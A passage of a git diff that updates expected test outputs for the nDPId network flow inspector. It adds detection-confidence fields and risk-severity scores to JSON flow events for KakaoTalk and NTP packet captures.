-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+01170{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","total-events-serialized":115}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -121,10 +121,10 @@
 ~~ total active/idle flows...: 20/20
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4744748 bytes
-~~ total memory freed........: 4744748 bytes
-~~ total allocations/frees...: 102846/102846
+~~ total memory allocated....: 4821117 bytes
+~~ total memory freed........: 4821117 bytes
+~~ total allocations/frees...: 104436/104436
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 1167 chars
-~~ json string avg len.......: 739 chars
+~~ json string max len.......: 1517 chars
+~~ json string avg len.......: 914 chars
diff --git a/test/results/NTPv2.pcap.out b/test/results/NTPv2.pcap.out
index b90e27ba2..4bbc6b562 100644
--- a/test/results/NTPv2.pcap.out
+++ b/test/results/NTPv2.pcap.out
@@ -1,8 +1,8 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"NTPv2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00917{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865383632,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"ts_msec":1436865383632,"pkt":"RIpbLCrSACaIdf8bCABFAAGMHS4AADERoZDQaF8KTi5MAgB7AFABeH6Xlw4DKgAFAEgAAAAAAAAQOgAAAAAAAAGISO9ZbawQDGUAAAABDAIHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAQZwAAAAAAAADHQLufDawQDGUAAAABuxwHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQxAAAAAAAAAa6UEgp0qwQDGUAAAABKtoHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ2AAAAAAAAAWzX1q4C6wQDGUAAAABAFAHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ2wAAAAAAAAWRR3um9qwQDGUAAAABAFAHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":42,"version":42}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":42,"version":42}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
 ~~ json string max len.......: 922 chars
diff --git a/test/results/NTPv3.pcap.out b/test/results/NTPv3.pcap.out
index e9bb7004b..6583bdd44 100644
--- a/test/results/NTPv3.pcap.out
+++ b/test/results/NTPv3.pcap.out
@@ -1,8 +1,8 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"NTPv3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865405371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1436865405371,"pkt":"RIpbLCrSACaIdf8bCABFAABMAABAADcRbcOvkIwdTi5MAgB7AFAAOLcYHAAE+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZT08RAAAAANlPTxEAAAAA"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 640 chars
-~~ json string avg len.......: 456 chars
+~~ json string max len.......: 666 chars
+~~ json string avg len.......: 467 chars
diff --git a/test/results/NTPv4.pcap.out b/test/results/NTPv4.pcap.out
index 8e878a913..1487c6423 100644
--- a/test/results/NTPv4.pcap.out
+++ b/test/results/NTPv4.pcap.out
@@ -1,8 +1,8 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"NTPv4.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865396190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1436865396190,"pkt":"RIpb2HMEACaIdf8bCABFAABMrX9AADcRaFpVFj54Ti5MCwB7AHsAOKmfIwIH6wAABFAAAAOrg7wD39lPUcMxZbhg2URXVTAzb9DZRFdVMbTpeNlPUfQtJuL0"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
